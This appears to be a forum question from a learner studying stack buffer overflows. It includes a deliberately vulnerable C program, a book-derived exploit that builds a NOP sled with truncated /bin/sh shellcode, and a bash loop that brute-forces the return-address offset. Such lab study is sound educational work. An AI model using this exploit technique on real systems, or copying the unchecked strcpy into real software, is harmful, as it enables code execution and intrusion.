to understand the buffer overflow concept I write a little code, called overflow.c:
#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[]){
char buffer[100];
if(argc > 1){
strcpy(buffer, argv[1]);
}
else{
printf("Please give a string to the program\n");
}
}
As you can see, no check before we copy the command-line input into our 100-byte array, called buffer.
Now, I take another sample of code(from Hacking:The Art of Exploitation, btw a great book). In my case, it looks like the following:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
//shellcode has 50 bytes of data
char shellcode[]="\xeb\x1a\x5e......[SKIPPED]......\x4b"; // (*)
int main(int argc, char *argv[]) {
unsigned int i, *ptr, ret, offset=0;
char *command, *buffer;
command = (char *) malloc(200);
bzero(command, 200); // Zero out the new memory.
strcpy(command, "./overflow \'"); // Start command buffer (**)
buffer = command + strlen(command); // Set buffer at the end.
if(argc > 1){ // Set offset.
offset = atoi(argv[1]);
}
ret = (unsigned int) &i - offset; // Set return address.
for(i=0; i < 150; i+=4){ // Fill buffer with return address. (***)
*((unsigned int *)(buffer+i)) = ret;
}
memset(buffer, 0x90, 50); // Build NOP sled.
memcpy(buffer+50, shellcode, sizeof(shellcode)-1);
strcat(command, "\'");
system(command); // Run exploit.
free(command);
}
So, what I did is: At ( * ) I changed the shellcode array because the opcodes are different. I also skipped the most of that part. But they are also representing an execve syscall (the typical /bin/sh ). And at ( ** ) I change "Start command buffer"-line with "/.overflow" and the offset is set to 0. Since my shellcode has the size 50 bytes, I also changed the loop value at ( *** )
What I understand: I understand the NOP sled part and why we need to know the target return address in advance.
What I do not understand was the offset guessing part. Therefore I draw to sketches on a piece of paper:
Heap and Stack of exploit_overflow.c
Lower Address
------------------+
| | |
| ----------------- | v
| | *buffer -----+ +-----------+----------+-----------+-----+
Heap ---------------- | | | | |
| | *command ----+ |./overflow | NOP sled | Shellcode | RET |
v ----------------- | | | | | |
| . | | +-----------+----------+-----------+-----+
| . | | ^
| . | | |
| . | +-----+
-----------------
| offset | ^
----------------- |
| ret | |
----------------- |
| *ptr | |
----------------- |
| i | Stack
----------------- |
| old ebp | |
----------------- |
| return address| |
----------------- |
| argc | |
----------------- |
| argv[] | |
-----------------
Higher Address
So,in the book it says that the variable i is taken as point of reference. They subtract an offset (which is guessed experimentally) from the address of the variable i. But when I compute the address of i minus the guessed offset then I get another address which is my target address? They set the ret-variable to that address. But why ? My Goal is to reach an address within the NOP sled, right ? When I do that and try to guess an offset I always get a "Segmentation fault". I guess that I do not choose the right offset, right ? If it so, can somebody tell me why ?
Note:
1) During the compile process I use the options -fno-stack-protector and -z execstack
2) For the offset guessing I use the recommended BASH script with the for loop
for i in $(seq 0 30 300)
do
echo Trying offset $i
./exploit_overflow $i
done
But everytime I get a Segmentation fault.
I hope somebody can help.
best regards,